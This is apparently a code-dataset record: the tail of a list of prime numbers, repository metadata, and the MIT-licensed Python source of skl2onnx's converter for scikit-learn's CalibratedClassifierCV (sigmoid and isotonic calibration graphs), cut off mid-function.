9,74017,74021,74027,74047,74051,74071,74077,74093,74099,74101,74131,74143,74149,74159,74161,74167,74177,74189,74197,74201,74203,74209,74219,74231,74257,74279,74287,74293,74297,74311,74317,74323,74353,74357,74363,74377,74381,74383,74411,74413,74419,74441,74449,74453,74471,
74489,74507,74509,74521,74527,74531,74551,74561,74567,74573,74587,74597,74609,74611,74623,74653,74687,74699,74707,74713,74717,74719,74729,74731,74747,74759,74761,74771,74779,74797,74821,74827,74831,74843,74857,74861,74869,74873,74887,74891,74897,74903,74923,74929,74933,74941,74959,75011,75013,75017,75029,75037,75041,75079,75083,75109,75133,75149,75161,75167,75169,75181,75193,75209,75211,75217,75223,75227,75239,75253,75269,75277,75289,75307,75323,75329,75337,75347,75353,75367,75377,75389,75391,75401,75403,75407,75431,75437,75479,75503,75511,75521,75527,75533,75539,75541,75553,75557,75571,75577,75583,75611,75617,75619,75629,75641,75653,75659,75679,75683,75689,75703,75707,75709,75721,75731,75743,75767,75773,75781,75787,75793,75797,75821,75833,75853,75869,75883,75913,75931,75937,75941,75967,75979,75983,75989,75991,75997,76001,76003,76031,76039,76079,76081,76091,76099,76103,76123,76129,76147,76157,76159,76163,76207,76213,76231,76243,76249,76253,76259,76261,76283,76289,76303,76333,76343,76367,76369,76379,76387,76403,76421,76423,76441,76463,76471,76481,76487,76493,76507,76511,76519,76537,76541,76543,76561,76579,76597,76603,76607,76631,76649,76651,76667,76673,76679,76697,76717,76733,76753,76757,76771,76777,76781,76801,76819,76829,76831,76837,76847,76871,76873,76883,76907,76913,76919,76943,76949,76961,76963,76991,77003,77017,77023,77029,77041,77047,77069,77081,77093,77101,77137,77141,77153,77167,77171,77191,77201,77213,77237,77239,77243,77249,77261,77263,77267,77269,77279,77291,77317,77323,77339,77347,77351,77359,77369,77377,77383,77417,77419,77431,77447,77471,77477,77479,77489,77491,77509,77513,77521,77527,77543,77549,77551,77557,77563,77569,77573,77587,77591,77611,77617,77621,77641,77647,77659,77681,77687,77689,77699,77711,77713,77719,77723,77731,77743,77747,77761,77773,77783,77797,77801,77813,77839,77849,77863,77867,77893,77899,77929,77933,77951,77969,77977,77983,77999,78007,78017,78031,78041,78049,78059,78079,78101,78121,78137,78139,78157,78163,78167,78173,78179,78191,78193,78203,78229,78233,78241,78259,78277,78283,78301,78307,78311,78317,78341,78347,78367,78401,78427,78437,78439,78467,78479,78487,78497,78509,78511,78517,78539,78541,78553,78569,78571,78577,78583,78593,78607,78623,78643,78649,78653,78691,78697,78707,78713,78721,78737,78779,78781,78787,78791,78797,78803,78809,78823,78839,78853,78857,78877,78887,78889,78893,78901,78919,78929,78941,78977,78979,78989,79031,79039,79043,79063,79087,79103,79111,79133,79139,79147,79151,79153,79159,79181,79187,79193,79201,79229,79231,79241,79259,79273,79279,79283,79301,79309,79319,79333,79337,79349,79357,79367,79379,79393,79397,79399,79411,79423,79427,79433,79451,79481,79493,79531,79537,79549,79559,79561,79579,79589,79601,79609,79613,79621,79627,79631,79633,79657,79669,79687,79691,79693,79697,79699,79757,79769,79777,79801,79811,79813,79817,79823,79829,79841,79843,79847,79861,79867,79873,79889,79901,79903,79907,79939,79943,79967,79973,79979,79987,79997,79999,80021,80039,80051,80071,80077,80107,80111,80141,80147,80149,80153,80167,80173,80177,80191,80207,80209,80221,80231,80233,80239,80251,80263,80273,80279,80287,80309,80317,80329,80341,80347,80363,80369,80387,80407,80429,80447,80449,80471,80473,80489,80491,80513,80527,80537,80557,80567,80599,80603,80611,80621,80627,80629,80651,80657,80669,80671,80677,80681,80683,80687,80701,80713,80737,80747,80749,80761,80777,80779,80783,80789,80803,80809,80819,80831,80833,80849,80863,80897,80909,80911,80917,80923,80929,80933,80953,80963,80989,81001,81013,81017,81019,81023,81031,81041,81043,81047,81049,81071,81077,81083,810
97,81101,81119,81131,81157,81163,81173,81181,81197,81199,81203,81223,81233,81239,81281,81283,81293,81299,81307,81331,81343,81349,81353,81359,81371,81373,81401,81409,81421,81439,81457,81463,81509,81517,81527,81533,81547,81551,81553,81559,81563,81569,81611,81619,81629,81637,81647,81649,81667,81671,81677,81689,81701,81703,81707,81727,81737,81749,81761,81769,81773,81799,81817,81839,81847,81853,81869,81883,81899,81901,81919,81929,81931,81937,81943,81953,81967,81971,81973,82003,82007,82009,82013,82021,82031,82037,82039,82051,82067,82073,82129,82139,82141,82153,82163,82171,82183,82189,82193,82207,82217,82219,82223,82231,82237,82241,82261,82267,82279,82301,82307,82339,82349,82351,82361,82373,82387,82393,82421,82457,82463,82469,82471,82483,82487,82493,82499,82507,82529,82531,82549,82559,82561,82567,82571,82591,82601,82609,82613,82619,82633,82651,82657,82699,82721,82723,82727,82729,82757,82759,82763,82781,82787,82793,82799,82811,82813,82837,82847,82883,82889,82891,82903,82913,82939,82963,82981,82997,83003,83009,83023,83047,83059,83063,83071,83077,83089,83093,83101,83117,83137,83177,83203,83207,83219,83221,83227,83231,83233,83243,83257,83267,83269,83273,83299,83311,83339,83341,83357,83383,83389,83399,83401,83407,83417,83423,83431,83437,83443,83449,83459,83471,83477,83497,83537,83557,83561,83563,83579,83591,83597,83609,83617,83621,83639,83641,83653,83663,83689,83701,83717,83719,83737,83761,83773,83777,83791,83813,83833,83843,83857,83869,83873,83891,83903,83911,83921,83933,83939,83969,83983,83987,84011,84017,84047,84053,84059,84061,84067,84089,84121,84127,84131,84137,84143,84163,84179,84181,84191,84199,84211,84221,84223,84229,84239,84247,84263,84299,84307,84313,84317,84319,84347,84349,84377,84389,84391,84401,84407,84421,84431,84437,84443,84449,84457,84463,84467,84481,84499,84503,84509,84521,84523,84533,84551,84559,84589,84629,84631,84649,84653,84659,84673,84691,84697,84701,84713,84719,84731,84737,84751,84761,84787,84793,84809,84811,84827,84857,84859,84869,84871,84913,84919,84947,84961,84967,84977,84979,84991,85009,85021,85027,85037,85049,85061,85081,85087,85091,85093,85103,85109,85121,85133,85147,85159,85193,85199,85201,85213,85223,85229,85237,85243,85247,85259,85297,85303,85313,85331,85333,85361,85363,85369,85381,85411,85427,85429,85439,85447,85451,85453,85469,85487,85513,85517,85523,85531,85549,85571,85577,85597,85601,85607,85619,85621,85627,85639,85643,85661,85667,85669,85691,85703,85711,85717,85733,85751,85781,85793,85817,85819,85829,85831,85837,85843,85847,85853,85889,85903,85909,85931,85933,85991,85999,86011,86017,86027,86029,86069,86077,86083,86111,86113,86117,86131,86137,86143,86161,86171,86179,86183,86197,86201,86209,86239,86243,86249,86257,86263,86269,86287,86291,86293,86297,86311,86323,86341,86351,86353,86357,86369,86371,86381,86389,86399,86413,86423,86441,86453,86461,86467,86477,86491,86501,86509,86531,86533,86539,86561,86573,86579,86587,86599,86627,86629,86677,86689,86693,86711,86719,86729,86743,86753,86767,86771,86783,86813,86837,86843,86851,86857,86861,86869,86923,86927,86929,86939,86951,86959,86969,86981,86993,87011,87013,87037,87041,87049,87071,87083,87103,87107,87119,87121,87133,87149,87151,87179,87181,87187,87211,87221,87223,87251,87253,87257,87277,87281,87293,87299,87313,87317,87323,87337,87359,87383,87403,87407,87421,87427,87433,87443,87473,87481,87491,87509,87511,87517,87523,87539,87541,87547,87553,87557,87559,87583,87587,87589,87613,87623,87629,87631,87641,87643,87649,87671,87679,87683,87691,87697,87701,87719,87721,87739,87743,87751,87767,87793,87797,87803,87811,87833,87853,87869,
87877,87881,87887,87911,87917,87931,87943,87959,87961,87973,87977,87991,88001,88003,88007,88019,88037,88069,88079,88093,88117,88129,88169,88177,88211,88223,88237,88241,88259,88261,88289,88301,88321,88327,88337,88339,88379,88397,88411,88423,88427,88463,88469,88471,88493,88499,88513,88523,88547,88589,88591,88607,88609,88643,88651,88657,88661,88663,88667,88681,88721,88729,88741,88747,88771,88789,88793,88799,88801,88807,88811,88813,88817,88819,88843,88853,88861,88867,88873,88883,88897,88903,88919,88937,88951,88969,88993,88997,89003,89009,89017,89021,89041,89051,89057,89069,89071,89083,89087,89101,89107,89113,89119,89123,89137,89153,89189,89203,89209,89213,89227,89231,89237,89261,89269,89273,89293,89303,89317,89329,89363,89371,89381,89387,89393,89399,89413,89417,89431,89443,89449,89459,89477,89491,89501,89513,89519,89521,89527,89533,89561,89563,89567,89591,89597,89599,89603,89611,89627,89633,89653,89657,89659,89669,89671,89681,89689,89753,89759,89767,89779,89783,89797,89809,89819,89821,89833,89839,89849,89867,89891,89897,89899,89909,89917,89923,89939,89959,89963,89977,89983,89989,90001,90007,90011,90017,90019,90023,90031,90053,90059,90067,90071,90073,90089,90107,90121,90127,90149,90163,90173,90187,90191,90197,90199,90203,90217,90227,90239,90247,90263,90271,90281,90289,90313,90353,90359,90371,90373,90379,90397,90401,90403,90407,90437,90439,90469,90473,90481,90499,90511,90523,90527,90529,90533,90547,90583,90599,90617,90619,90631,90641,90647,90659,90677,90679,90697,90703,90709,90731,90749,90787,90793,90803,90821,90823,90833,90841,90847,90863,90887,90901,90907,90911,90917,90931,90947,90971,90977,90989,90997,91009,91019,91033,91079,91081,91097,91099,91121,91127,91129,91139,91141,91151,91153,91159,91163,91183,91193,91199,91229,91237,91243,91249,91253,91283,91291,91297,91303,91309,91331,91367,91369,91373,91381,91387,91393,91397,91411,91423,91433,91453,91457,91459,91463,91493,91499,91513,91529,91541,91571,91573,91577,91583,91591,91621,91631,91639,91673,91691,91703,91711,91733,91753,91757,91771,91781,91801,91807,91811,91813,91823,91837,91841,91867,91873,91909,91921,91939,91943,91951,91957,91961,91967,91969,91997,92003,92009,92033,92041,92051,92077,92083,92107,92111,92119,92143,92153,92173,92177,92179,92189,92203,92219,92221,92227,92233,92237,92243,92251,92269,92297,92311,92317,92333,92347,92353,92357,92363,92369,92377,92381,92383,92387,92399,92401,92413,92419,92431,92459,92461,92467,92479,92489,92503,92507,92551,92557,92567,92569,92581,92593,92623,92627,92639,92641,92647,92657,92669,92671,92681,92683,92693,92699,92707,92717,92723,92737,92753,92761,92767,92779,92789,92791,92801,92809,92821,92831,92849,92857,92861,92863,92867,92893,92899,92921,92927,92941,92951,92957,92959,92987,92993,93001,93047,93053,93059,93077,93083,93089,93097,93103,93113,93131,93133,93139,93151,93169,93179,93187,93199,93229,93239,93241,93251,93253,93257,93263,93281,93283,93287,93307,93319,93323,93329,93337,93371,93377,93383,93407,93419,93427,93463,93479,93481,93487,93491,93493,93497,93503,93523,93529,93553,93557,93559,93563,93581,93601,93607,93629,93637,93683,93701,93703,93719,93739,93761,93763,93787,93809,93811,93827,93851,93871,93887,93889,93893,93901,93911,93913,93923,93937,93941,93949,93967,93971,93979,93983,93997,94007,94009,94033,94049,94057,94063,94079,94099,94109,94111,94117,94121,94151,94153,94169,94201,94207,94219,94229,94253,94261,94273,94291,94307,94309,94321,94327,94331,94343,94349,94351,94379,94397,94399,94421,94427,94433,94439,94441,94447,94463,94477,94483,94513,94529,94531,94541,94543,94547,94559,94561,94573,94583,945
97,94603,94613,94621,94649,94651,94687,94693,94709,94723,94727,94747,94771,94777,94781,94789,94793,94811,94819,94823,94837,94841,94847,94849,94873,94889,94903,94907,94933,94949,94951,94961,94993,94999,95003,95009,95021,95027,95063,95071,95083,95087,95089,95093,95101,95107,95111,95131,95143,95153,95177,95189,95191,95203,95213,95219,95231,95233,95239,95257,95261,95267,95273,95279,95287,95311,95317,95327,95339,95369,95383,95393,95401,95413,95419,95429,95441,95443,95461,95467,95471,95479,95483,95507,95527,95531,95539,95549,95561,95569,95581,95597,95603,95617,95621,95629,95633,95651,95701,95707,95713,95717,95723,95731,95737,95747,95773,95783,95789,95791,95801,95803,95813,95819,95857,95869,95873,95881,95891,95911,95917,95923,95929,95947,95957,95959,95971,95987,95989,96001,96013,96017,96043,96053,96059,96079,96097,96137,96149,96157,96167,96179,96181,96199,96211,96221,96223,96233,96259,96263,96269,96281,96289,96293,96323,96329,96331,96337,96353,96377,96401,96419,96431,96443,96451,96457,96461,96469,96479,96487,96493,96497,96517,96527,96553,96557,96581,96587,96589,96601,96643,96661,96667,96671,96697,96703,96731,96737,96739,96749,96757,96763,96769,96779,96787,96797,96799,96821,96823,96827,96847,96851,96857,96893,96907,96911,96931,96953,96959,96973,96979,96989,96997,97001,97003,97007,97021,97039,97073,97081,97103,97117,97127,97151,97157,97159,97169,97171,97177,97187,97213,97231,97241,97259,97283,97301,97303,97327,97367,97369,97373,97379,97381,97387,97397,97423,97429,97441,97453,97459,97463,97499,97501,97511,97523,97547,97549,97553,97561,97571,97577,97579,97583,97607,97609,97613,97649,97651,97673,97687,97711,97729,97771,97777,97787,97789,97813,97829,97841,97843,97847,97849,97859,97861,97871,97879,97883,97919,97927,97931,97943,97961,97967,97973,97987,98009,98011,98017,98041,98047,98057,98081,98101,98123,98129,98143,98179,98207,98213,98221,98227,98251,98257,98269,98297,98299,98317,98321,98323,98327,98347,98369,98377,98387,98389,98407,98411,98419,98429,98443,98453,98459,98467,98473,98479,98491,98507,98519,98533,98543,98561,98563,98573,98597,98621,98627,98639,98641,98663,98669,98689,98711,98713,98717,98729,98731,98737,98773,98779,98801,98807,98809,98837,98849,98867,98869,98873,98887,98893,98897,98899,98909,98911,98927,98929,98939,98947,98953,98963,98981,98993,98999,99013,99017,99023,99041,99053,99079,99083,99089,99103,99109,99119,99131,99133,99137,99139,99149,99173,99181,99191,99223,99233,99241,99251,99257,99259,99277,99289,99317,99347,99349,99367,99371,99377,99391,99397,99401,99409,99431,99439,99469,99487,99497,99523,99527,99529,99551,99559,99563,99571,99577,99581,99607,99611,99623,99643,99661,99667,99679,99689,99707,99709,99713,99719,99721,99733,99761,99767,99787,99793,99809,99817,99823,99829,99833,99839,99859,99871,99877,99881,99901,99907,99923,99929,99961,99971,99989,99991,100003,100019,100043,100049,100057,100069,100103,100109,100129,100151,100153,100169,100183,100189,100193,100207,100213,100237,100267,100271,100279,100291,100297,100313,100333,100343,100357,100361,100363,100379,100391,100393,100403,100411,100417,100447,100459,100469,100483,100493,100501,100511,100517,100519,100523,100537,100547,100549,100559,100591,100609,100613,100621,100649,100669,100673,100693,100699,100703,100733,100741,100747,100769,100787,100799,100801,100811,100823,100829,100847,100853,100907,100913,100927,100931,100937,100943,100957,100981,100987,100999,101009,101021,101027,101051,101063,101081,101089,101107,101111,101113,101117,101119,101141,101149,101159,101161,101173,101183,101197,101203,101207,101209,101221,101267,101273,10
1279,101281,101287,101293,101323,101333,101341,101347,101359,101363,101377,101383,101399,101411,101419,101429,101449,101467,101477,101483,101489,101501,101503,101513,101527,101531,101533,101537,101561,101573,101581,101599,101603,101611,101627,101641,101653,101663,101681,101693,101701,101719,101723,101737,101741,101747,101749,101771,101789,101797,101807,101833,101837,101839,101863,101869,101873,101879,101891,101917,101921,101929,101939,101957,101963,101977,101987,101999,102001,102013,102019,102023,102031,102043,102059,102061,102071,102077,102079,102101,102103,102107,102121,102139,102149,102161]
| 57,480
| 57,480
| 0.829715
|
d42861bbc31fff616a52a59b81b7e32ca430c8fa
| 21,484
|
py
|
Python
|
skl2onnx/operator_converters/calibrated_classifier_cv.py
|
m3at/sklearn-onnx
|
080b6231cad09b8ada9e1901aa9262e44db0fb74
|
[
"MIT"
] | null | null | null |
skl2onnx/operator_converters/calibrated_classifier_cv.py
|
m3at/sklearn-onnx
|
080b6231cad09b8ada9e1901aa9262e44db0fb74
|
[
"MIT"
] | null | null | null |
skl2onnx/operator_converters/calibrated_classifier_cv.py
|
m3at/sklearn-onnx
|
080b6231cad09b8ada9e1901aa9262e44db0fb74
|
[
"MIT"
] | null | null | null |
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pprint
import numpy as np
from ..proto import onnx_proto
from ..common._apply_operation import (
apply_abs, apply_add, apply_cast, apply_concat, apply_clip,
apply_div, apply_exp, apply_mul, apply_reshape, apply_sub)
from ..common._topology import FloatTensorType
from ..common._registration import register_converter
from .._supported_operators import sklearn_operator_name_map
def _handle_zeros(scope, container, concatenated_prob_name,
reduced_prob_name, n_classes):
"""
This function replaces 0s in concatenated_prob_name with 1s and
0s in reduced_prob_name with n_classes.
"""
cast_prob_name = scope.get_unique_variable_name('cast_prob')
bool_not_cast_prob_name = scope.get_unique_variable_name(
'bool_not_cast_prob')
mask_name = scope.get_unique_variable_name('mask')
masked_concatenated_prob_name = scope.get_unique_variable_name(
'masked_concatenated_prob')
n_classes_name = scope.get_unique_variable_name('n_classes')
reduced_prob_mask_name = scope.get_unique_variable_name(
'reduced_prob_mask')
masked_reduced_prob_name = scope.get_unique_variable_name(
'masked_reduced_prob')
container.add_initializer(n_classes_name, onnx_proto.TensorProto.FLOAT,
[], [n_classes])
apply_cast(scope, reduced_prob_name, cast_prob_name, container,
to=onnx_proto.TensorProto.BOOL)
container.add_node('Not', cast_prob_name,
bool_not_cast_prob_name,
name=scope.get_unique_operator_name('Not'))
apply_cast(scope, bool_not_cast_prob_name, mask_name, container,
to=onnx_proto.TensorProto.FLOAT)
apply_add(scope, [concatenated_prob_name, mask_name],
masked_concatenated_prob_name, container, broadcast=1)
apply_mul(scope, [mask_name, n_classes_name], reduced_prob_mask_name,
container, broadcast=1)
apply_add(scope, [reduced_prob_name, reduced_prob_mask_name],
masked_reduced_prob_name, container, broadcast=0)
return masked_concatenated_prob_name, masked_reduced_prob_name
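# Hedged reference (exposition only, not used by the converter): the ONNX
# graph assembled by _handle_zeros above is equivalent to the following
# NumPy logic, assuming reduced_prob has shape (M, 1) so it broadcasts
# against the (M, C) matrix of per-class probabilities.
def _numpy_handle_zeros_reference(concatenated_prob, reduced_prob, n_classes):
    """NumPy sketch: rows whose probability sum is 0 get their sum replaced
    by n_classes and each of their class probabilities shifted by 1."""
    mask = (reduced_prob == 0).astype(np.float32)
    return concatenated_prob + mask, reduced_prob + n_classes * mask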
def _transform_sigmoid(scope, container, model, df_col_name, k):
"""
Sigmoid Calibration method
"""
a_name = scope.get_unique_variable_name('a')
b_name = scope.get_unique_variable_name('b')
a_df_prod_name = scope.get_unique_variable_name('a_df_prod')
exp_parameter_name = scope.get_unique_variable_name(
'exp_parameter')
exp_result_name = scope.get_unique_variable_name('exp_result')
unity_name = scope.get_unique_variable_name('unity')
denominator_name = scope.get_unique_variable_name('denominator')
sigmoid_predict_result_name = scope.get_unique_variable_name(
'sigmoid_predict_result')
container.add_initializer(a_name, onnx_proto.TensorProto.FLOAT,
[], [model.calibrators_[k].a_])
container.add_initializer(b_name, onnx_proto.TensorProto.FLOAT,
[], [model.calibrators_[k].b_])
container.add_initializer(unity_name, onnx_proto.TensorProto.FLOAT,
[], [1])
apply_mul(scope, [a_name, df_col_name], a_df_prod_name, container,
broadcast=0)
apply_add(scope, [a_df_prod_name, b_name], exp_parameter_name,
container, broadcast=0)
apply_exp(scope, exp_parameter_name, exp_result_name, container)
apply_add(scope, [unity_name, exp_result_name], denominator_name,
container, broadcast=0)
apply_div(scope, [unity_name, denominator_name],
sigmoid_predict_result_name, container, broadcast=0)
return sigmoid_predict_result_name
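# Hedged reference (exposition only): the graph built by _transform_sigmoid
# encodes Platt scaling with the calibrator's fitted slope a_ and intercept
# b_, i.e. p = 1 / (1 + exp(a * df + b)). A plain-NumPy equivalent:
def _numpy_sigmoid_calibration_reference(df, a, b):
    """NumPy sketch of the sigmoid (Platt) calibration graph above."""
    return 1.0 / (1.0 + np.exp(a * df + b))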
def _transform_isotonic(scope, container, model, T, k):
"""
Isotonic calibration method
This function can only handle one instance at a time because
ArrayFeatureExtractor can only extract based on the last axis,
so we can't fetch different columns for different rows.
"""
if model.calibrators_[k].out_of_bounds == 'clip':
clipped_df_name = scope.get_unique_variable_name('clipped_df')
apply_clip(scope, T, clipped_df_name, container,
operator_name=scope.get_unique_operator_name('Clip'),
max=np.array(model.calibrators_[k].X_max_,
dtype=container.dtype),
min=np.array(model.calibrators_[k].X_min_,
dtype=container.dtype))
T = clipped_df_name
reshaped_df_name = scope.get_unique_variable_name('reshaped_df')
calibrator_x_name = scope.get_unique_variable_name('calibrator_x')
calibrator_y_name = scope.get_unique_variable_name('calibrator_y')
distance_name = scope.get_unique_variable_name('distance')
absolute_distance_name = scope.get_unique_variable_name(
'absolute_distance')
nearest_x_index_name = scope.get_unique_variable_name(
'nearest_x_index')
nearest_y_name = scope.get_unique_variable_name('nearest_y')
if hasattr(model.calibrators_[k], '_X_'):
atX, atY = '_X_', '_y_'
elif hasattr(model.calibrators_[k], '_necessary_X_'):
atX, atY = '_necessary_X_', '_necessary_y_'
elif hasattr(model.calibrators_[k], 'X_thresholds_'):
atX, atY = 'X_thresholds_', 'y_thresholds_'
else:
raise AttributeError(
"Unable to find attribute '_X_' or '_necessary_X_' "
"for type {}\n{}."
"".format(type(model.calibrators_[k]),
pprint.pformat(dir(model.calibrators_[k]))))
container.add_initializer(
calibrator_x_name, onnx_proto.TensorProto.FLOAT,
[len(getattr(model.calibrators_[k], atX))],
getattr(model.calibrators_[k], atX))
container.add_initializer(
calibrator_y_name, onnx_proto.TensorProto.FLOAT,
[len(getattr(model.calibrators_[k], atY))],
getattr(model.calibrators_[k], atY))
apply_reshape(scope, T, reshaped_df_name, container,
desired_shape=(-1, 1))
apply_sub(scope, [reshaped_df_name, calibrator_x_name],
distance_name, container, broadcast=1)
apply_abs(scope, distance_name, absolute_distance_name, container)
container.add_node('ArgMin', absolute_distance_name,
nearest_x_index_name, axis=1,
name=scope.get_unique_operator_name('ArgMin'))
container.add_node(
'ArrayFeatureExtractor',
[calibrator_y_name, nearest_x_index_name],
nearest_y_name, op_domain='ai.onnx.ml',
name=scope.get_unique_operator_name('ArrayFeatureExtractor'))
nearest_y_name_reshaped = scope.get_unique_variable_name(
'nearest_y_name_reshaped')
apply_reshape(scope, nearest_y_name,
nearest_y_name_reshaped, container,
desired_shape=(-1, 1))
return nearest_y_name_reshaped
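# Hedged reference (exposition only): at inference time the graph above
# approximates the fitted isotonic regression by snapping each decision
# value to its nearest calibration threshold and returning the matching y
# (the optional clipping to [X_min_, X_max_] is omitted in this sketch).
def _numpy_isotonic_nearest_reference(df, x_thresholds, y_thresholds):
    """NumPy sketch of the nearest-threshold lookup built in ONNX above."""
    df = np.asarray(df, dtype=np.float32).reshape(-1, 1)
    idx = np.argmin(np.abs(df - np.asarray(x_thresholds)), axis=1)
    return np.asarray(y_thresholds)[idx].reshape(-1, 1)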
def convert_calibrated_classifier_base_estimator(scope, operator, container,
model):
# Computational graph:
#
# In the following graph, variable names are in lower case characters only
# and operator names are in upper case characters. We borrow operator names
# from the official ONNX spec:
# https://github.com/onnx/onnx/blob/master/docs/Operators.md
# All variables are followed by their shape in [].
#
# Symbols:
# M: Number of instances
# N: Number of features
# C: Number of classes
# CLASSIFIERCONVERTER: classifier converter corresponding to the op_type
# a: slope in sigmoid model
# b: intercept in sigmoid model
# k: variable in the range [0, C)
# input: input
# class_prob_tensor: tensor with class probabilities(function output)
#
# Graph:
#
# input [M, N] -> CLASSIFIERCONVERTER -> label [M]
# |
# V
# probability_tensor [M, C]
# |
# .----------------'---------.
# | |
# V V
# ARRAYFEATUREEXTRACTOR <- k [1] -> ARRAYFEATUREEXTRACTOR
# | |
# V V
# transposed_df_col[M, 1] transposed_df_col[M, 1]
# |--------------------------|----------.--------------------------.
# | | | |
# |if model.method='sigmoid' | |if model.method='isotonic'|
# | | | |
# V V |if out_of_bounds='clip' |
# MUL <-------- a --------> MUL V V
# | | CLIP ... CLIP
# V V | |
# a_df_prod [M, 1] ... a_df_prod [M, 1] V V
# | | clipped_df [M, 1]...clipped_df [M, 1]
# V V | |
# ADD <--------- b ---------> ADD '-------------------.------'
# | | |
# V V |
# exp_parameter [M, 1] ... exp_parameter [M, 1] |
# | | |
# V V |
# EXP ... EXP |
# | | |
# V V |
# exp_result [M, 1] ... exp_result [M, 1] |
# | | |
# V V |
# ADD <------- unity -------> ADD |
# | | |
# V V |
# denominator [M, 1] ... denominator [M, 1] |
# | | |
# V V |
# DIV <------- unity ------> DIV |
# | | |
# V V |
# sigmoid_predict_result [M, 1] ... sigmoid_predict_result [M, 1] |
# | | |
# '-----.--------------------' |
# |-------------------------------------------------'
# |
# V
# CONCAT -> concatenated_prob [M, C]
# |
# if C = 2 | if C != 2
# .-------------------'---------------------------.---------.
# | | |
# V | V
# ARRAYFEATUREEXTRACTOR <- col_number [1] | REDUCESUM
# | | |
# '--------------------------------. | |
# unit_float_tensor [1] -> SUB <- first_col [M, 1] <-' | |
# | / |
# V V V
# CONCAT DIV <- reduced_prob [M]
# | |
# V |
# class_prob_tensor [M, C] <--'
if scope.get_options(operator.raw_operator, dict(nocl=False))['nocl']:
raise RuntimeError(
"Option 'nocl' is not implemented for operator '{}'.".format(
operator.raw_operator.__class__.__name__))
base_model = model.base_estimator
op_type = sklearn_operator_name_map[type(base_model)]
n_classes = len(model.classes_)
prob_name = [None] * n_classes
this_operator = scope.declare_local_operator(op_type)
this_operator.raw_operator = base_model
if container.has_options(base_model, 'raw_scores'):
container.add_options(id(base_model), {'raw_scores': True})
this_operator.inputs = operator.inputs
label_name = scope.declare_local_variable('label')
df_name = scope.declare_local_variable('probability_tensor',
FloatTensorType())
this_operator.outputs.append(label_name)
this_operator.outputs.append(df_name)
df_inp = df_name.full_name
for k in range(n_classes):
cur_k = k
if n_classes == 2:
cur_k += 1
# In case of binary classification, SVMs only return
# scores for the positive class. We concat the same
# column twice as we just use the second column.
if op_type in ('SklearnLinearSVC', 'SklearnSVC'):
df_input_name = scope.get_unique_variable_name('df_input')
merged_input_name = scope.get_unique_variable_name(
'merged_input')
apply_reshape(scope, df_inp,
df_input_name, container,
desired_shape=(-1, 1))
apply_concat(scope, [df_input_name, df_input_name],
merged_input_name, container, axis=1)
df_inp = merged_input_name
k_name = scope.get_unique_variable_name('k')
df_col_name = scope.get_unique_variable_name('transposed_df_col')
prob_name[k] = scope.get_unique_variable_name('prob_{}'.format(k))
container.add_initializer(k_name, onnx_proto.TensorProto.INT64,
[], [cur_k])
container.add_node(
'ArrayFeatureExtractor', [df_inp, k_name], df_col_name,
name=scope.get_unique_operator_name('ArrayFeatureExtractor'),
op_domain='ai.onnx.ml')
T = (_transform_sigmoid(scope, container, model, df_col_name, k)
if model.method == 'sigmoid' else
_transform_isotonic(scope, container, model, df_col_name, k))
prob_name[k] = T
if n_classes == 2:
break
if n_classes == 2:
zeroth_col_name = scope.get_unique_variable_name('zeroth_col')
merged_prob_name = scope.get_unique_variable_name('merged_prob')
unit_float_tensor_name = scope.get_unique_variable_name(
'unit_float_tensor')
container.add_initializer(unit_float_tensor_name,
onnx_proto.TensorProto.FLOAT, [], [1.0])
apply_sub(scope, [unit_float_tensor_name, prob_name[0]],
zeroth_col_name, container, broadcast=1)
apply_concat(scope, [zeroth_col_name, prob_name[0]],
merged_prob_name, container, axis=1)
class_prob_tensor_name = merged_prob_name
else:
concatenated_prob_name = scope.get_unique_variable_name(
'concatenated_prob')
reduced_prob_name = scope.get_unique_variable_name('reduced_prob')
calc_prob_name = scope.get_unique_variable_name('calc_prob')
apply_concat(scope, prob_name, concatenated_prob_name,
container, axis=1)
container.add_node('ReduceSum', concatenated_prob_name,
reduced_prob_name, axes=[1],
name=scope.get_unique_operator_name('ReduceSum'))
num, deno = _handle_zeros(scope, container, concatenated_prob_name,
reduced_prob_name, n_classes)
apply_div(scope, [num, deno],
calc_prob_name, container, broadcast=1)
class_prob_tensor_name = calc_prob_name
return class_prob_tensor_name
def convert_sklearn_calibrated_classifier_cv(scope, operator, container):
# Computational graph:
#
# In the following graph, variable names are in lower case characters only
# and operator names are in upper case characters. We borrow operator names
# from the official ONNX spec:
# https://github.com/onnx/onnx/blob/master/docs/Operators.md
# All variables are followed by their shape in [].
#
# Symbols:
# M: Number of instances
# N: Number of features
# C: Number of classes
# CONVERT_BASE_ESTIMATOR: base estimator convert function defined above
# clf_length: number of calibrated classifiers
# input: input
# output: output
# class_prob: class probabilities
#
# Graph:
#
# input [M, N]
# |
# .-------------------|--------------------------.
# | | |
# V V V
# CONVERT_BASE_ESTIMATOR CONVERT_BASE_ESTIMATOR ... CONVERT_BASE_ESTIMATOR
# | | |
# V V V
# prob_scores_0 [M, C] prob_scores_1 [M, C] ... prob_scores_(clf_length-1)
# | | | [M, C]
# '-------------------|--------------------------'
# V
# add_result [M, C] <--- SUM
# |
# '--> DIV <- clf_length [1]
# |
# V
# class_prob [M, C] -> ARGMAX -> argmax_output [M, 1]
# |
# classes -> ARRAYFEATUREEXTRACTOR <---'
# |
# V
# output [1]
op = operator.raw_operator
classes = op.classes_
output_shape = (-1,)
class_type = onnx_proto.TensorProto.STRING
if np.issubdtype(op.classes_.dtype, np.floating):
class_type = onnx_proto.TensorProto.INT32
classes = classes.astype(np.int32)
elif np.issubdtype(op.classes_.dtype, np.signedinteger):
class_type = onnx_proto.TensorProto.INT32
else:
classes = np.array([s.encode('utf-8') for s in classes])
clf_length = len(op.calibrated_classifiers_)
prob_scores_name = []
clf_length_name = scope.get_unique_variable_name('clf_length')
classes_name = scope.get_unique_variable_name('classes')
reshaped_result_name = scope.get_unique_variable_name('reshaped_result')
argmax_output_name = scope.get_unique_variable_name('argmax_output')
array_feature_extractor_result_name = scope.get_unique_variable_name(
'array_feature_extractor_result')
add_result_name = scope.get_unique_variable_name('add_result')
container.add_initializer(classes_name, class_type, classes.shape, classes)
container.add_initializer(clf_length_name, onnx_proto.TensorProto.FLOAT,
[], [clf_length])
for clf in op.calibrated_classifiers_:
prob_scores_name.append(convert_calibrated_classifier_base_estimator(
scope, operator, container, clf))
container.add_node('Sum', [s for s in prob_scores_name],
add_result_name, op_version=7,
name=scope.get_unique_operator_name('Sum'))
apply_div(scope, [add_result_name, clf_length_name],
operator.outputs[1].full_name, container, broadcast=1)
class_prob_name = operator.outputs[1].full_name
